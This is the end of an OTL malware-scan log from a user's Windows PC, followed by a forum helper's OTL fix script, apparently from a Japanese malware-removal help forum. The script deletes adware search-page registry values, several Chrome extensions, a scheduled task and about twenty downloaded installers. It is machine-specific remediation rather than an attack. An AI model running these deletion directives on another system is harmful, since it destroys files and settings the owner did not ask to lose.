[2015/04/04 18:34:25 | 000,000,000 | --SD | C] -- C:\WINDOWS\SysWow64\GWX
[2015/04/04 18:34:25 | 000,000,000 | --SD | C] -- C:\WINDOWS\SysNative\GWX
[2015/04/04 18:11:11 | 000,000,000 | ---D | C] -- C:\Users\ryota\Desktop\Mario Story (J) [!]
[2015/04/04 18:08:59 | 000,000,000 | ---D | C] -- C:\Users\ryota\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\JWord(日本語キーワード)
[2015/04/04 17:31:07 | 000,000,000 | ---D | C] -- C:\Users\ryota\AppData\Roaming\Geek Uninstaller
[2015/04/04 16:36:25 | 000,000,000 | ---D | C] -- C:\Users\ryota\Desktop\geek
[2015/04/04 16:33:36 | 000,050,688 | ---- | C] (Atribune.org) -- C:\Users\ryota\Desktop\ATF-Cleaner (1).exe
[2015/02/02 23:25:12 | 000,782,480 | ---- | C] (Neople inc) -- C:\Users\ryota\AppData\Local\AradIns.exe
[2015/02/02 23:24:38 | 000,584,336 | ---- | C] (Neople inc) -- C:\Users\ryota\AppData\Local\NeopleCustomURLStarter.exe
[4 C:\WINDOWS\SysWow64\*.tmp files -> C:\WINDOWS\SysWow64\*.tmp -> ]
[1 C:\WINDOWS\*.tmp files -> C:\WINDOWS\*.tmp -> ]

[color=#E56717]========== Files - Modified Within 30 Days ==========[/color]

[2015/04/21 19:59:00 | 000,000,706 | ---- | M] () -- C:\WINDOWS\tasks\GoogleUpdateTaskMachineUA.job
[2015/04/21 19:48:00 | 000,000,626 | ---- | M] () -- C:\WINDOWS\tasks\Adobe Flash Player Updater.job
[2015/04/21 08:59:00 | 000,000,702 | ---- | M] () -- C:\WINDOWS\tasks\GoogleUpdateTaskMachineCore.job
[2015/04/21 02:02:31 | 000,002,196 | ---- | M] () -- C:\Users\Public\Desktop\Google Chrome.lnk
[2015/04/21 02:02:13 | 000,067,584 | --S- | M] () -- C:\WINDOWS\bootstat.dat
[2015/04/21 02:00:06 | 268,435,456 | -HS- | M] () -- C:\swapfile.sys
[2015/04/21 02:00:00 | 2474,680,319 | -HS- | M] () -- C:\hiberfil.sys
[2015/04/20 22:35:30 | 000,000,020 | ---- | M] () -- C:\Users\ryota\AppData\Roaming\appdataFr3.bin
[2015/04/20 21:58:27 | 000,001,140 | ---- | M] () -- C:\Users\Public\Desktop\herdProtect.lnk
[2015/04/20 21:57:26 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\ryota\Desktop\OTL.exe
[2015/04/20 21:54:14 | 002,873,112 | ---- | M] (Reason Company Software Inc.) -- C:\Users\ryota\Desktop\herdProtectScan_Setup.exe
[2015/04/18 19:31:33 | 001,496,524 | ---- | M] () -- C:\WINDOWS\SysNative\PerfStringBackup.INI
[2015/04/18 19:31:33 | 000,722,278 | ---- | M] () -- C:\WINDOWS\SysNative\perfh009.dat
[2015/04/18 19:31:33 | 000,499,650 | ---- | M] () -- C:\WINDOWS\SysNative\perfh011.dat
[2015/04/18 19:31:33 | 000,135,458 | ---- | M] () -- C:\WINDOWS\SysNative\perfc011.dat
[2015/04/18 19:31:33 | 000,135,394 | ---- | M] () -- C:\WINDOWS\SysNative\perfc009.dat
[2015/04/16 05:31:51 | 000,215,552 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\SysNative\msclmd.dll
[2015/04/16 05:31:51 | 000,195,072 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\SysWow64\msclmd.dll
[2015/04/14 08:24:21 | 000,792,056 | ---- | M] (Adobe Systems Incorporated) -- C:\WINDOWS\SysWow64\FlashPlayerApp.exe
[2015/04/14 08:24:21 | 000,178,168 | ---- | M] (Adobe Systems Incorporated) -- C:\WINDOWS\SysWow64\FlashPlayerCPLApp.cpl
[2015/04/04 21:39:57 | 000,001,132 | ---- | M] () -- C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
[2015/04/04 21:23:16 | 010,285,040 | ---- | M] (Malwarebytes Corporation ) -- C:\Users\ryota\Desktop\mbam-setup-1.75.0.1300.exe
[2015/04/04 19:51:47 | 000,001,098 | ---- | M] () -- C:\Users\ryota\Application Data\Microsoft\Internet Explorer\Quick Launch\WorldofTanks.lnk
[2015/04/04 19:43:00 | 000,000,310 | ---- | M] () -- C:\WINDOWS\tasks\Price Meter Updater.job
[2015/04/04 19:25:29 | 000,001,170 | ---- | M] () -- C:\Users\Public\Desktop\Mozilla Firefox.lnk
[2015/04/04 16:38:09 | 000,000,841 | ---- | M] () -- C:\Users\Public\Desktop\CCleaner.lnk
[2015/04/04 16:33:39 | 000,050,688 | ---- | M] (Atribune.org) -- C:\Users\ryota\Desktop\ATF-Cleaner (1).exe
[2015/03/24 06:59:25 | 001,733,952 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\SysNative\ntdll.dll
[2015/03/24 06:59:25 | 000,360,480 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\SysNative\sechost.dll
[2015/03/24 06:59:00 | 007,476,032 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\SysNative\ntoskrnl.exe
[2015/03/23 07:45:41 | 000,227,328 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\SysNative\aepdu.dll
[2015/03/23 07:09:23 | 000,726,528 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\SysNative\generaltel.dll
[2015/03/23 07:09:22 | 001,111,552 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\SysNative\aeinv.dll
[2015/03/23 07:09:22 | 000,957,440 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\SysNative\appraiser.dll
[2015/03/23 07:09:22 | 000,769,024 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\SysNative\invagent.dll
[2015/03/23 07:09:22 | 000,419,328 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\SysNative\devinv.dll
[2015/03/23 07:09:22 | 000,030,720 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\SysNative\acmigration.dll
[4 C:\WINDOWS\SysWow64\*.tmp files -> C:\WINDOWS\SysWow64\*.tmp -> ]
[1 C:\WINDOWS\*.tmp files -> C:\WINDOWS\*.tmp -> ]

[color=#E56717]========== Files Created - No Company Name ==========[/color]

[2015/04/20 21:58:27 | 000,001,140 | ---- | C] () -- C:\Users\Public\Desktop\herdProtect.lnk
[2015/04/15 04:37:38 | 000,016,303 | ---- | C] () -- C:\WINDOWS\SysWow64\ieuinit.inf
[2015/04/15 04:37:38 | 000,016,303 | ---- | C] () -- C:\WINDOWS\SysNative\ieuinit.inf
[2015/04/04 21:24:37 | 000,001,132 | ---- | C] () -- C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
[2015/03/15 00:01:07 | 000,107,008 | ---- | C] () -- C:\WINDOWS\SysWow64\OEMLicense.dll
[2015/03/14 23:59:54 | 000,046,080 | ---- | C] () -- C:\WINDOWS\SysWow64\BWContextHandler.dll
[2015/03/02 14:09:57 | 000,000,020 | ---- | C] () -- C:\Users\ryota\AppData\Roaming\appdataFr3.bin
[2014/11/19 17:11:37 | 000,000,242 | RHS- | C] () -- C:\ProgramData\ntuser.pol
[2014/10/01 19:54:10 | 000,183,808 | ---- | C] () -- C:\WINDOWS\SysWow64\igdde32.dll
[2014/10/01 19:54:10 | 000,143,360 | ---- | C] () -- C:\WINDOWS\SysWow64\igdail32.dll
[2014/09/24 15:58:21 | 000,002,255 | ---- | C] () -- C:\WINDOWS\SysWow64\WimBootCompress.ini
[2014/02/15 00:25:26 | 000,645,632 | ---- | C] () -- C:\WINDOWS\SysWow64\xvidcore.dll
[2014/02/15 00:25:26 | 000,240,640 | ---- | C] () -- C:\WINDOWS\SysWow64\xvidvfw.dll
[2014/02/15 00:25:25 | 000,079,360 | ---- | C] () -- C:\WINDOWS\SysWow64\ff_vfw.dll
[2014/02/15 00:25:17 | 000,178,688 | ---- | C] () -- C:\WINDOWS\SysWow64\unrar.dll
[2014/02/15 00:25:15 | 000,715,038 | ---- | C] () -- C:\WINDOWS\unins000.exe
[2014/02/15 00:25:15 | 000,216,064 | ---- | C] ( ) -- C:\WINDOWS\SysWow64\lagarith.dll
[2014/02/15 00:25:15 | 000,001,990 | ---- | C] () -- C:\WINDOWS\unins000.dat
[2013/10/28 17:28:07 | 000,188,416 | ---- | C] () -- C:\WINDOWS\SysWow64\utv_core.dll
[2013/10/28 17:28:07 | 000,069,632 | ---- | C] () -- C:\WINDOWS\SysWow64\utv_vcm.dll
[2013/09/15 16:04:47 | 000,000,189 | ---- | C] () -- C:\Users\ryota\AppData\Roaming\WB.CFG
[2013/08/23 00:36:43 | 000,215,943 | ---- | C] () -- C:\WINDOWS\SysWow64\dssec.dat
[2013/08/23 00:36:42 | 000,000,741 | ---- | C] () -- C:\WINDOWS\SysWow64\NOISE.DAT
[2013/08/22 23:46:23 | 000,067,584 | --S- | C] () -- C:\WINDOWS\bootstat.dat
[2013/08/22 16:01:23 | 000,043,131 | ---- | C] () -- C:\WINDOWS\mib.bin
[2013/08/22 08:55:20 | 000,364,544 | ---- | C] () -- C:\WINDOWS\SysWow64\msjetoledb40.dll
[2013/08/22 08:52:39 | 000,673,088 | ---- | C] () -- C:\WINDOWS\SysWow64\mlang.dat
[2012/12/18 00:56:03 | 001,161,682 | ---- | C] () -- C:\Users\ryota\記録されたゲーム - 17-12-2012 10`00`02.mgx
[2012/12/13 15:28:00 | 012,706,828 | ---- | C] () -- C:\Users\ryota\03 Another Heaven.mp3
[2012/12/13 15:28:00 | 010,296,232 | ---- | C] () -- C:\Users\ryota\06 Kaleidoscope(transparent mix|Bonus Track).mp3
[2012/12/13 15:28:00 | 009,962,152 | ---- | C] () -- C:\Users\ryota\05 ARCADIA-Instrumental-.mp3
[2012/12/13 15:28:00 | 009,877,588 | ---- | C] () -- C:\Users\ryota\02 HORIZON.mp3
[2012/12/13 15:28:00 | 009,842,092 | ---- | C] () -- C:\Users\ryota\01 ARCADIA.mp3
[2012/12/13 15:28:00 | 003,751,396 | ---- | C] () -- C:\Users\ryota\04 ARCADIA-game Ver.-.mp3
[2012/10/31 18:22:16 | 000,003,077 | ---- | C] () -- C:\ProgramData\cfSB1290.ini

[color=#E56717]========== ZeroAccess Check ==========[/color]

[2015/04/20 22:45:57 | 000,000,227 | RHS- | M] () -- C:\WINDOWS\assembly\Desktop.ini

[HKEY_CURRENT_USER\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64

[HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]

[HKEY_CURRENT_USER\Software\Classes\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32] /64

[HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32]

[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64
"" = C:\Windows\SysNative\shell32.dll -- [2015/02/13 02:40:58 | 022,291,584 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment

[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]
"" = %SystemRoot%\system32\shell32.dll -- [2015/02/13 02:34:06 | 019,731,824 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment

[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32] /64
"" = C:\Windows\SysNative\wbem\fastprox.dll -- [2014/10/29 10:19:43 | 001,013,760 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free

[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32]
"" = %systemroot%\system32\wbem\fastprox.dll -- [2014/10/29 09:59:23 | 000,786,944 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free

[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32] /64
"" = C:\Windows\SysNative\wbem\wbemess.dll -- [2014/10/29 10:16:01 | 000,512,512 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Both

[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32]

[color=#E56717]========== Custom Scans ==========[/color]

[color=#A23BEC]< %windir%\tasks\*.job >[/color]
[2015/04/21 19:48:00 | 000,000,626 | ---- | M] () -- C:\WINDOWS\tasks\Adobe Flash Player Updater.job
[2015/04/21 08:59:00 | 000,000,702 | ---- | M] () -- C:\WINDOWS\tasks\GoogleUpdateTaskMachineCore.job
[2015/04/21 19:59:00 | 000,000,706 | ---- | M] () -- C:\WINDOWS\tasks\GoogleUpdateTaskMachineUA.job
[2015/04/04 19:43:00 | 000,000,310 | ---- | M] () -- C:\WINDOWS\tasks\Price Meter Updater.job

[color=#E56717]========== Drive Information ==========[/color]

Physical Drives
---------------

Drive: \\\\.\\PHYSICALDRIVE0 - Fixed hard disk media
Interface type: IDE
Media Type: Fixed hard disk media
Model: WDC WD5000AAKX-00ERMA0
Partitions: 5
Status: OK
Status Info: 0

Drive: \\\\.\\PHYSICALDRIVE1 -
Interface type: USB
Media Type:
Model: Multi Flash Reader USB Device
Partitions: 0
Status: OK
Status Info: 0

Partitions
---------------

DeviceID: Disk #0, Partition #0
PartitionType: GPT: Unknown
Bootable: False
BootPartition: False
PrimaryPartition: False
Size: 300.00MB
Starting Offset: 1048576
Hidden sectors: 0


DeviceID: Disk #0, Partition #1
PartitionType: GPT: System
Bootable: True
BootPartition: True
PrimaryPartition: True
Size: 100.00MB
Starting Offset: 315621376
Hidden sectors: 0


DeviceID: Disk #0, Partition #2
PartitionType: GPT: Unknown
Bootable: False
BootPartition: False
PrimaryPartition: False
Size: 8.00GB
Starting Offset: 554696704
Hidden sectors: 0


DeviceID: Disk #0, Partition #3
PartitionType: GPT: Basic Data
Bootable: False
BootPartition: False
PrimaryPartition: True
Size: 457.00GB
Starting Offset: 8943304704
Hidden sectors: 0


DeviceID: Disk #0, Partition #4
PartitionType: GPT: Unknown
Bootable: False
BootPartition: False
PrimaryPartition: False
Size: 456.00MB
Starting Offset: 499629686784
Hidden sectors: 0


[color=#E56717]========== Base Services ==========[/color]
SRV:[b]64bit:[/b] - [2014/10/29 11:42:20 | 000,214,528 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\aelupsvc.dll -- (AeLookupSvc)
SRV:[b]64bit:[/b] - [2014/10/29 11:44:33 | 000,110,080 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\appinfo.dll -- (Appinfo)
SRV:[b]64bit:[/b] - [2014/10/29 10:21:02 | 000,096,768 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\alg.exe -- (ALG)
SRV:[b]64bit:[/b] - [2014/10/29 10:43:34 | 000,933,376 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\qmgr.dll -- (BITS)
SRV:[b]64bit:[/b] - [2014/10/29 10:24:40 | 000,845,312 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\BFE.DLL -- (BFE)
SRV:[b]64bit:[/b] - [2014/10/29 10:22:40 | 000,062,464 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\keyiso.dll -- (KeyIso)
SRV - [2014/10/29 10:01:27 | 000,046,592 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysWOW64\keyiso.dll -- (KeyIso)
SRV:[b]64bit:[/b] - [2014/10/29 10:12:28 | 000,516,608 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\es.dll -- (EventSystem)
SRV - [2014/10/29 09:55:10 | 000,367,616 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysWOW64\es.dll -- (EventSystem)
SRV:[b]64bit:[/b] - [2014/10/29 10:26:50 | 000,135,168 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\browser.dll -- (Browser)
SRV:[b]64bit:[/b] - [2014/10/29 10:27:24 | 000,131,584 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\cryptsvc.dll -- (CryptSvc)
SRV:[b]64bit:[/b] - [2014/10/29 10:19:29 | 000,817,664 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\rpcss.dll -- (DcomLaunch)
SRV:[b]64bit:[/b] - [2014/10/29 10:29:06 | 000,365,056 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\dhcpcore.dll -- (Dhcp)
SRV - [2014/10/29 10:05:58 | 000,292,864 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysWOW64\dhcpcore.dll -- (Dhcp)
SRV:[b]64bit:[/b] - [2014/10/29 10:29:41 | 000,252,416 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\dnsrslvr.dll -- (Dnscache)
SRV:[b]64bit:[/b] - [2014/10/29 10:14:35 | 000,110,592 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\eapsvc.dll -- (Eaphost)
SRV:[b]64bit:[/b] - [2014/10/29 11:44:23 | 000,033,792 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\hidserv.dll -- (hidserv)
SRV - [2014/10/29 10:59:46 | 000,030,720 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysWOW64\hidserv.dll -- (hidserv)
SRV:[b]64bit:[/b] - [2014/10/29 10:07:58 | 000,452,608 | ---- | M] (Microsoft Corporation) [Disabled | Stopped] -- C:\Windows\SysNative\ipnathlp.dll -- (SharedAccess)
SRV:[b]64bit:[/b] - [2014/10/29 10:08:58 | 000,397,312 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\IPSECSVC.DLL -- (PolicyAgent)
No service found with a name of MsMpSvc
No service found with a name of NisSrv
SRV:[b]64bit:[/b] - [2014/10/29 10:01:45 | 000,706,048 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\swprv.dll -- (swprv)
SRV:[b]64bit:[/b] - [2014/10/29 10:22:44 | 000,071,168 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\mmcss.dll -- (MMCSS)
SRV:[b]64bit:[/b] - [2014/10/29 09:51:03 | 000,266,752 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\netman.dll -- (Netman)
SRV:[b]64bit:[/b] - [2014/10/29 10:19:20 | 000,550,912 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\netprofmsvc.dll -- (netprofm)
SRV:[b]64bit:[/b] - [2014/12/06 10:41:58 | 000,391,680 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\nlasvc.dll -- (NlaSvc)
SRV:[b]64bit:[/b] - [2014/10/29 10:29:16 | 000,028,672 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\nsisvc.dll -- (nsi)
SRV:[b]64bit:[/b] - [2014/10/29 11:45:24 | 000,116,736 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\umpnpmgr.dll -- (PlugPlay)
SRV:[b]64bit:[/b] - [2014/10/29 09:54:15 | 000,827,392 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\spoolsv.exe -- (Spooler)
No service found with a name of ProtectedStorage
No service found with a name of EMDMgmt
SRV:[b]64bit:[/b] - [2014/10/29 11:34:42 | 000,102,912 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\rasauto.dll -- (RasAuto)
SRV:[b]64bit:[/b] - [2014/10/29 09:59:21 | 000,542,208 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\rasmans.dll -- (RasMan)
SRV:[b]64bit:[/b] - [2014/10/29 10:19:29 | 000,817,664 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\rpcss.dll -- (RpcSs)
SRV:[b]64bit:[/b] - [2014/10/29 11:42:25 | 000,031,744 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\seclogon.dll -- (seclogon)
SRV:[b]64bit:[/b] - [2014/10/29 12:51:48 | 000,047,024 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\lsass.exe -- (SamSs)
SRV:[b]64bit:[/b] - [2014/10/29 09:56:06 | 000,146,944 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\wscsvc.dll -- (wscsvc)
SRV:[b]64bit:[/b] - [2014/10/29 10:18:49 | 000,329,216 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\srvsvc.dll -- (LanmanServer)
SRV:[b]64bit:[/b] - [2014/10/29 10:04:06 | 000,640,000 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\shsvcs.dll -- (ShellHWDetection)
SRV - [2014/10/29 09:49:09 | 000,576,512 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysWOW64\shsvcs.dll -- (ShellHWDetection)
No service found with a name of slsvc
SRV:[b]64bit:[/b] - [2014/10/29 09:52:52 | 001,265,152 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\schedsvc.dll -- (Schedule)
SRV:[b]64bit:[/b] - [2014/10/29 11:12:14 | 000,313,344 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\tapisrv.dll -- (TapiSrv)
SRV - [2014/10/29 10:34:59 | 000,254,464 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysWOW64\tapisrv.dll -- (TapiSrv)
SRV:[b]64bit:[/b] - [2014/10/29 10:26:29 | 000,059,392 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\themeservice.dll -- (Themes)
SRV:[b]64bit:[/b] - [2014/12/09 10:50:34 | 000,225,280 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\profsvc.dll -- (ProfSvc)
SRV:[b]64bit:[/b] - [2014/10/29 09:59:28 | 001,454,080 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\VSSVC.exe -- (VSS)
SRV:[b]64bit:[/b] - [2014/10/29 10:02:48 | 000,911,360 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\audiosrv.dll -- (Audiosrv)
SRV:[b]64bit:[/b] - [2014/12/06 10:35:00 | 000,229,888 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\AudioEndpointBuilder.dll -- (AudioEndpointBuilder)
No service found with a name of SDRSVC
SRV:[b]64bit:[/b] - [2015/02/04 08:58:28 | 000,023,792 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Program Files\Windows Defender\MsMpEng.exe -- (WinDefend)
SRV:[b]64bit:[/b] - [2014/10/29 10:16:27 | 001,696,256 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\wevtsvc.dll -- (EventLog)
SRV:[b]64bit:[/b] - [2014/10/29 10:02:44 | 000,880,640 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\MPSSVC.dll -- (MpsSvc)
SRV:[b]64bit:[/b] - [2014/10/29 10:59:24 | 000,670,720 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\wiaservc.dll -- (stisvc)
SRV:[b]64bit:[/b] - [2014/10/29 11:35:14 | 000,064,512 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\WINDOWS\SysNative\msiexec.exe -- (msiserver)
SRV - [2014/10/29 10:52:53 | 000,059,904 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\WINDOWS\SysWow64\msiexec.exe -- (msiserver)
SRV:[b]64bit:[/b] - [2014/10/29 10:18:13 | 000,230,400 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\wbem\WMIsvc.dll -- (Winmgmt)
SRV:[b]64bit:[/b] - [2015/03/14 09:22:58 | 003,678,720 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\wuaueng.dll -- (wuauserv)
SRV:[b]64bit:[/b] - [2014/10/29 10:53:17 | 000,262,144 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\dot3svc.dll -- (dot3svc)
SRV:[b]64bit:[/b] - [2014/10/29 10:03:56 | 001,547,264 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\wlansvc.dll -- (WlanSvc)
SRV:[b]64bit:[/b] - [2014/10/29 10:24:29 | 000,289,280 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\wkssvc.dll -- (LanmanWorkstation)

[color=#A23BEC]< %SYSTEMDRIVE%\*.exe >[/color]
[2007/11/20 23:08:08 | 000,562,688 | ---- | M] (Microsoft Corporation) -- C:\install.exe
[2010/07/08 01:11:00 | 000,183,296 | R--- | M] (I-O DATA DEVICE,INC.) -- C:\IOOCI.EXE

[color=#E56717]========== Files - Unicode (All) ==========[/color]
(C:\Users\ryota\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\傲游??器 3) -- C:\Users\ryota\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\傲游浏览器 3

[color=#E56717]========== Alternate Data Streams ==========[/color]

@Alternate Data Stream - 118 bytes -> C:\ProgramData\Temp:373E1720

< End of report >
  • かなは
  • 2015/04/21 (Tue) 20:30:14
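Fix with OTL
The Firefox problem appears to have been resolved.
HP is no longer needed, so please remove it by following the instructions given when you installed it.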

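Open Notepad and copy and paste the following into it.
Note that :OTL, :Files, :Commands and so on are directives that tell OTL how to process the entries.
Please be careful not to delete them.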

------Copy and paste from below this line------
:OTL
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Search,CustomizeSearch = http://search.jword.jp/jwd_sb_srchcust.htm?ielang={SUB_RFC1766}
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Search,OCustomizeSearch = http://search.jword.jp/jwd_sb_srchcust.htm?ielang={SUB_RFC1766}
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Search,OSearchAssistant = http://search.jword.jp/jwd_sb_srchasst.htm?ielang={SUB_RFC1766}
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Search,SearchAssistant = http://search.jword.jp/jwd_sb_srchasst.htm?ielang={SUB_RFC1766}
IE - HKU\S-1-5-21-1488747381-3182991089-3951260014-1001\SOFTWARE\Microsoft\Internet Explorer\Main,Secondary Start Pages = http://home.kingsoft.jp [binary data]
CHR - Extension: Twitch Stream = C:\Users\ryota\AppData\Local\Google\Chrome\User Data\Default\Extensions\fjaicoojlfoococemdcaollmhaiolole\207\
CHR - Extension: Dropmark sidebar = C:\Users\ryota\AppData\Local\Google\Chrome\User Data\Default\Extensions\foiapgoppijipmmgkaibacckkhbngfhp\171\
CHR - Extension: BlocKUTubEADi = C:\Users\ryota\AppData\Local\Google\Chrome\User Data\Default\Extensions\geoafhlnmffijlblgohnpmjfbnpcpadd\3.2_0\
O4 - HKU\S-1-5-21-1488747381-3182991089-3951260014-1001..\Run: [DAEMON Tools Lite] C:\Program Files (x86)\DAEMON Tools Lite\DTLite.exe (Disc Soft Ltd)
[2015/04/04 21:21:57 | 010,285,040 | ---- | C] (Malwarebytes Corporation ) -- C:\Users\ryota\Desktop\mbam-setup-1.75.0.1300.exe
[2015/04/04 18:08:59 | 000,000,000 | ---D | C] -- C:\Users\ryota\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\JWord(日本語キーワード)
[2015/04/04 19:43:00 | 000,000,310 | ---- | M] () -- C:\WINDOWS\tasks\Price Meter Updater.job

:files
c:\programdata\cjhlcgankhfaeohlngbhkhbnhmhaokmc
c:\users\ryota\appdata\local\google\chrome\user data\default\extensions\fjaicoojlfoococemdcaollmhaiolole
c:\users\ryota\appdata\local\google\chrome\user data\default\extensions\foiapgoppijipmmgkaibacckkhbngfhp
c:\users\ryota\appdata\local\google\chrome\user data\default\extensions\geoafhlnmffijlblgohnpmjfbnpcpadd
c:\users\ryota\downloads\tw628j.exe
c:\users\ryota\downloads\cr_downloader_for_super-smash-bros..exe
c:\users\ryota\downloads\dtlite4491-0356.exe
c:\users\ryota\downloads\daemon347_inst.exe
c:\users\ryota\downloads\fileopenersetup.exe
c:\users\ryota\downloads\freemakeaudioconvertersetup.exe
c:\users\ryota\downloads\downloadmanagersetup.exe
c:\users\ryota\downloads\adlsoft_uncompressor_v2_3.exe
c:\users\ryota\downloads\ccsetup404.exe
c:\users\ryota\downloads\codecpackage.exe
c:\users\ryota\downloads\downloader_for_shaman%20king%20card%20game%20-%20chou%20senjiryakketsu%202%20%28japan%29(1).exe
c:\users\ryota\downloads\downloader_for_shaman%20king%20card%20game%20-%20chou%20senjiryakketsu%202%20%28japan%29.exe
c:\users\ryota\downloads\dtlite4454-0314.exe
c:\users\ryota\downloads\file_opener.exe
c:\users\ryota\downloads\installer_manycam_3_0_92_japanese.exe
c:\users\ryota\downloads\rcpsetupdsnr_ds367212.exe
c:\users\ryota\downloads\setup.exe
